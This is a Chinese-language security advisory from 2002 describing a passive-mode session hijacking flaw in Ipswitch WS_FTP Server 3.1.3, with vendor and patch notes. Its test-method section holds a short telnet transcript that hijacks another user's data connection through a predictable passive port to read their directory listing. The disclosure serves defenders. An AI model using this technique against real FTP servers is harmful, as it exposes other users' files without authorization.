IPSwitch WS_FTP Server被动模式会话劫持漏洞
发布日期:2002-10-25
更新日期:2002-10-31
受影响系统:Ipswitch WS FTP Server 3.1.3
描述:
BUGTRAQ ID:
6051
Ipswitch WS_FTP Server是一款适用于Microsoft Windows操作系统下的FTP服务程序。
WS_FTP Server被动模式中存在会话劫持问题,远程攻击者可以利用这个漏洞利用获得目录列表、文件信息等内容。
WS_FTP Server存在会话劫持漏洞,当由用户发起被动连接时,由于FTP服务器打开的端口可预测,其他用户可以通过连接FTP服务器打开的端口,访问合法用户的会话,导致泄露任意信息、包括目录列表、文件信息、或者上载文件等。
<*来源:Gregory A Lundberg & Jeffrey R. Gerber (
lowhalo@hushmail.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=103556238723400&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
在某一个主机上进行FTP连接:
$ telnet x.x.x.x 21
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PASV
227 Entering Passive Mode (192,168,1,1,4,23).
LIST
150 Opening ASCII data connection for directory listing
然后,再从其他IP发起连接:
$ telnet x.x.x.x 1047
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
drwxr-x--- 2 lowhalo System 0 Jan 0 00:00 .
drwxr-x--- 2 lowhalo System 0 Jan 0 00:00 ..
- -rwxr-x--- 1 lowhalo System 1337 Jan 0 00:00 lh
Connection closed by foreign host.
建议:
厂商补丁:
Ipswitch
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.ipswitch.com/浏览次数:3121
严重程度:0(网友投票)
